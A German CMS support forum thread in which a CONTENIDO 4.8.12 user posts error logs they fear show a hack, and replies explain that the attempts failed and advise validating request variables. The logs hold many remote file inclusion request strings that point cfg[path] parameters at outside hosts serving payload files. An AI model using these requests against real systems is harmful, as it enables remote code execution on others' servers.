Seltsamer Fehlerloginhalt in 4.8.12 [gelöst]

Fragen zur Installation von CONTENIDO 4.9? Probleme bei der Konfiguration? Hinweise oder Fragen zur Entwicklung des Systemes oder zur Sicherheit?
Antworten
yui
Beiträge: 140
Registriert: Di 17. Jun 2003, 17:55
Kontaktdaten:

Seltsamer Fehlerloginhalt in 4.8.12 [gelöst]

Beitrag von yui »

Hallo zusammen,

meine obige Installation wurde gehackt. In den Fehlerlogs erscheinen folgenden Meldungen:
m_virtuemart/idfx1.TXT?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... mponents/c' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 6/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT??
[14-Jun-2009 19:06:20] /Contenido/cms/front_content.php?idcat=6/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? next_record called with no query pending in Module ID 25.
[14-Jun-2009 19:19:35] /Contenido/cms/front_content.php?idcat=60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... mponents/c' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT??
[14-Jun-2009 19:19:35] /Contenido/cms/front_content.php?idcat=60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? next_record called with no query pending in Module ID 24.
[14-Jun-2009 19:19:35] /Contenido/cms/front_content.php?idcat=60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... mponents/c' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT??
[14-Jun-2009 19:19:35] /Contenido/cms/front_content.php?idcat=60/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.pintoresenaccion.com/adminis ... /idfx1.TXT?? next_record called with no query pending in Module ID 25.
[15-Jun-2009 14:55:04] /Contenido/cms/front_content.php?idcat=77//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 77//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[15-Jun-2009 14:55:04] /Contenido/cms/front_content.php?idcat=77//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[15-Jun-2009 14:55:04] /Contenido/cms/front_content.php?idcat=77//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 77//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[15-Jun-2009 14:55:04] /Contenido/cms/front_content.php?idcat=77//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 07:21:10] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:21:10] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 07:21:10] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:21:10] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 07:29:59] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:29:59] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 07:29:59] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:29:59] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 07:44:26] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:44:26] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 07:44:26] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 07:44:26] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 08:41:49] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 08:41:49] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 08:41:49] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.angelcitytrading.com/css/1.txt??
[17-Jun-2009 08:41:49] /Contenido/cms/front_content.php?idcat=26//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.angelcitytrading.com/css/1.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 16:00:59] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][temp' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.enterprisenetwork.ie/mambots/idxx.txt??
[17-Jun-2009 16:00:59] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 16:00:59] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][temp' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.enterprisenetwork.ie/mambots/idxx.txt??
[17-Jun-2009 16:00:59] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 16:01:03] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][temp' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.enterprisenetwork.ie/mambots/idxx.txt??
[17-Jun-2009 16:01:03] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? next_record called with no query pending in Module ID 24.
[17-Jun-2009 16:01:03] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][temp' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=http://www.enterprisenetwork.ie/mambots/idxx.txt??
[17-Jun-2009 16:01:03] /Contenido/cms/front_content.php?idcat=26//contenido//contenido/includes/include.newsletter_jobs_subnav.php?cfg%5Bpath%5D%5Btemplates%5D=http://www.enterprisenetwork.ie/mambots/idxx.txt?? next_record called with no query pending in Module ID 25.
[17-Jun-2009 23:37:22] /Contenido/cms/front_content.php?idcat=20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt?' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt?
[17-Jun-2009 23:37:22] /Contenido/cms/front_content.php?idcat=20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt? next_record called with no query pending in Module ID 24.
[17-Jun-2009 23:37:22] /Contenido/cms/front_content.php?idcat=20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt? MySQL error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt?' at line 1
SELECT level FROM con_cat_tree WHERE idcat = 20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt?
[17-Jun-2009 23:37:22] /Contenido/cms/front_content.php?idcat=20//conlib/local.php?cfg[path][contenido]=http://www.x-pronet.com/board/safe1.txt? next_record called with no query pending in Module ID 25.
Nun wurde hier bereits über die include.newsletter_jobs_subnav.php geschrieben, allerdings weiss ich nicht, was ich jetzt am sinnvollsten anstelle. Kann mir jemand einen Tipp geben?

Danke und schöne Grüsse
yui
Zuletzt geändert von yui am Mo 22. Jun 2009, 10:43, insgesamt 1-mal geändert.
Ich weiß, dass ich nichts weiß. Sokrates
idea-tec
Beiträge: 1242
Registriert: Do 19. Sep 2002, 14:41
Wohnort: Dichtelbach
Kontaktdaten:

Re: 4.8.12 gehackt

Beitrag von idea-tec »

Mich würden die auswirkungen auf der Seite interessieren.
MfG, Karsten
Nicht Können bedeutet nicht, dass man etwas nicht beherrscht, sondern lediglich, dass man sich nicht traut es zu tun ;-)
| Internet | Ihr Logo deutschlandweit auf T-Shirts |
Diplomatie: Jemanden so in die Hölle zu schicken, dass er sich auf die Reise freut!!! ;-)
yui
Beiträge: 140
Registriert: Di 17. Jun 2003, 17:55
Kontaktdaten:

Re: 4.8.12 gehackt

Beitrag von yui »

Auf der Seite selbst ist nichts zu erkennen, es ist auch kein Quellcode zu erkennen ausser dem, der dort sein muss. Mein Provider hat mir geschrieben, dass es keinen auffälligen Traffic gibt.

Kann der Code auch bedeuten, dass zwar Contenido attackiert wurde, das aber eben keine Auswirkungen hat?
Ich weiß, dass ich nichts weiß. Sokrates
Dodger77
Beiträge: 3626
Registriert: Di 12. Okt 2004, 20:00
Wohnort: Voerde (Niederrhein)
Kontaktdaten:

Re: 4.8.12 gehackt

Beitrag von Dodger77 »

yui hat geschrieben:Kann der Code auch bedeuten, dass zwar Contenido attackiert wurde, das aber eben keine Auswirkungen hat?
Richtig. Die im Errorlog zu sehenden Angriffe auf die "/contenido/includes/include.newsletter_jobs_subnav.php" sollten in der 4.8.12 nicht zum Erfolg führen.
Oldperl
Beiträge: 4316
Registriert: Do 30. Jun 2005, 22:56
Wohnort: Eltmann, Unterfranken, Bayern
Hat sich bedankt: 6 Mal
Danksagung erhalten: 4 Mal
Kontaktdaten:

Re: 4.8.12 gehackt

Beitrag von Oldperl »

Hallo yui,

dein Problem liegt nicht direkt an Contenido, sondern an den Modulen mit ID 24 und 25. Dort werden per Request übergebene Daten, z.B. die idcat, nicht auf sicheren Inhalt geprüft, bzw. evtl. schon beim Request mit falschen Inhalten gefüllt.
Bitte prüfe entsprechend deine Module, evtl. sind dort noch ältere Module im Einsatz oder es wurde nicht auf Prüfung von Requestvariablen geachtet. Ein Einsatz der PHP-Boardmittel (is_numeric, mysql_realescape_string) oder der Securityklasse kann ich da nur empfehlen.

Gruß aus Franken

Ortwin

PS: Sollte es sich bei den Modulen um Standardmodule der 4.8.12 handeln, so bitte ich um kurze Info per PN um welche es sich handelt. Und bitte noch den Threadtitel abändern, da es sich nicht um einen geglückten Hack handelt, danke.
ConLite 3.0.0-dev, alternatives und stabiles Update von Contenido 4.8.x unter PHP 8.x - Download und Repo auf Gitport.de
phpBO Search Advanced - das Suchwort-Plugin für CONTENIDO 4.9
Mein Entwickler-Blog
idea-tec
Beiträge: 1242
Registriert: Do 19. Sep 2002, 14:41
Wohnort: Dichtelbach
Kontaktdaten:

Re: Seltsamer Fehlerloginhalt in 4.8.12 [gelöst]

Beitrag von idea-tec »

danke... ich hatte versucht, dass yui selbst erkennt, dass es kein hack gewesen sein kann.
wenn wir solche postigs vermeiden wollen, müssen wir die user ein wenig sensibilisieren und vor allem mit Wissen versorgen!!!
MfG, Karsten
Nicht Können bedeutet nicht, dass man etwas nicht beherrscht, sondern lediglich, dass man sich nicht traut es zu tun ;-)
| Internet | Ihr Logo deutschlandweit auf T-Shirts |
Diplomatie: Jemanden so in die Hölle zu schicken, dass er sich auf die Reise freut!!! ;-)
Antworten